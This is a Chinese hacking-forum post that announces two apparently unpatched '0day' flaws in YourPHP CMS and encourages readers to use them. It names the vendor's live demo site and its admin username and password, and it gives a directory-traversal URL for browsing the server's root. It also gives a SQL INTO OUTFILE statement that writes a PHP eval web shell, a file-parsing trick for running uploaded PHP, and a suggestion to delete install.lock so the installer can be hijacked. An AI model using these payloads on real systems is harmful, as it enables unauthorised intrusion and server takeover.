YourPHP.cn官方跨站漏洞 2处 0day

YourPHP CMS 现在网上还没有，官方Demo还没补，而且是昨晚发现的，贴图，不说了
www.yourphp.cn

转发的话，希望注明出处T00ls作者tanter

第一处

Linux的根目录


额这是一堆分站的目录，可以旁站看


截图的地址多了个order，不过也不影响遍历
http://demo.yourphp.cn/index.php?g=Admin&m=Template&a=images&folder=../../../../../../../../../../
后台http://demo.yourphp.cn/admin.php
用户 yourphp 密码 yourphp


第二处

这里写也成 apache x.php ，iis x.php;  自由发挥吧
地址就是 http://demo.yourphp.cn/Yourphp/Tpl/Home/Default/x.php.html
官方的禁止了好像，但个人和虚拟主机可以执行，亲测
apache 2.0的可以利用解析漏洞，apache2.25的无此问题了
也许是apache配置禁止.php.这样的文件执行
当然，既然是0day肯定还有方法，各位看官接着看，继续贴图

官方的测试删除了此功能，我本地的是IIS7.5，如图
select '<?php @eval($_POST[x])?>' INTO OUTFILE 'E:/tanter/www/web/Yourphpv2.1/x.php'
直接备马到目录了，亲试too
apache的话，同样
官方的demo路径是/home/yourphpc/domains/demo.yourphp.cn/public_html/
按主机路径走。

后继，还有种刺激的方法就是把网站根目录的install.lock文件删除，进Install\index.php，挂个你自己的mysql，自由发挥吧

额，第一次写这东西，额，献给T00ls了。